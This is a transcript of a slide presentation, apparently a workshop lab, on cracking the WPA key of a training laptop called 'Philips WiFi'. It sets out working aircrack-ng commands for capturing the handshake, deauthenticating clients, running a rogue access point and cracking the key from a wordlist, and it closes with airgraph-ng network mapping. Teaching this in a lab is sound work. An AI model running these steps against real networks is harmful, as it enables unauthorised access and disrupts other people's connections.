1 / 11

Practical stuff

Learn how to crack the WPA key of a Philips WiFi network with detailed steps, tips, and tools provided. From capturing handshake to cracking the password, this practical guide covers it all. CD with essential files included. 8

nbarrow
Download Presentation

Practical stuff

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Practical stuff • Crack the WPA key of this laptop. • SSID: « Philips WiFi » • Password list and cowpatty table available on CD (only useful today).

  2. Practical stuff - Tips • Make sure to disable all network managers and other programs using wireless interfaces: • airmon-ng check kill • Madwifi-ng • airmon-ng stop ath0 • airmon-ng start wifi0 • If you don’t see the handshake with aircrack-ng (or any other tool), open your capture file with wireshark and filter it with « eapol  ».

  3. Steps • Get the handshake • With the AP • Without the AP • Create airolib-ng database • Crack the handshake

  4. Get the handshake – With AP • Start airodump-ng to find the channel of the AP: airodump-ng INTERFACE • Make sure a client is connected. If there are none, you won’t be able to get the handshake • When you have the channel, stop the previous instance (Ctrl-C) and start it again on the channel of the AP (and save packets): airodump-ng –c AP_CHANNEL –w philips-capture INTERFACE • Open a new terminal and deauthenticate the client: aireplay-ng –deauth 1 –a BSSID –c CLIENT_MAC INTERFACE • If you didn’t get it, try again without specifying the client MAC (some drivers prefer broadcast deauth): aireplay-ng –deauth 1 –a BSSIDINTERFACE

  5. Get the handshake – Without AP • Start airbase-ng • WPA-PSK (TKIP) • SSID: Philips WiFi • Do not answer to any other probe request • Channel 6 • Save packets into philips-capture airbase-ng -z 2 -W 1 -e “Philips WiFi” –y -c 6 –F philips-capture rausb0 Notes: • I’ll do this; Everybody doing it at once may not give the expected result :) • However, you can start airodump-ng on channel 6: airodump-ng –c 6 –w philips-capture INTERFACE • A bug in madwifi-ng prevent it from working correctly with airbase-ng

  6. Creating airolib-ng database • Since a cowpatty table already exist, we’ll use it with airolib-ng: • Output database: philips_airolib • Import cowpatty file "Philips WiFi" airolib-ng philips_airolib --import cowpatty "Philips WiFi"

  7. Crack the handshake • Use aircrack-ng to crack the key: • Capture file: philips-capture-01.cap • Using airolib-ng database: aircrack-ng –r philips_airolib philips-capture-01.cap • Using a wordlist: aircrack-ng –w passphrases.txt philips-capture-01.cap

  8. Practical stuff - Airgraph-ng • Creates a picture of the wireless networks • Wardriver or just want to monitor your network, this is for you.

  9. Practical stuff - Airgraph-ng (2)

  10. Practical Stuff – Aigraph-ng (3) • Run airodump-ng with the parameters you want (however -w is mandatory to make it work). • Airodump-ng writes the CSV file every 5 seconds. • Whenever you want, start airgraph-ng on the CSV file.

  11. Practical stuff - Airgraph-ng (4) • Parameters: • Input file: Airodump-ng CSV file (.txt) • Graph type: • CAPR (Client – AP Relationship): Connected clients • CPG (Common Probe Graph): Probed SSID • Output file: Picture file name • Examples: • CAPR: airgraph-ng.py -i ../airgraph-01.txt -t CAPR -o ../airgraph-capr.png • CPG: airgraph-ng.py -i ../airgraph-01.txt -t CPG -o ../airgraph-cpg.png

More Related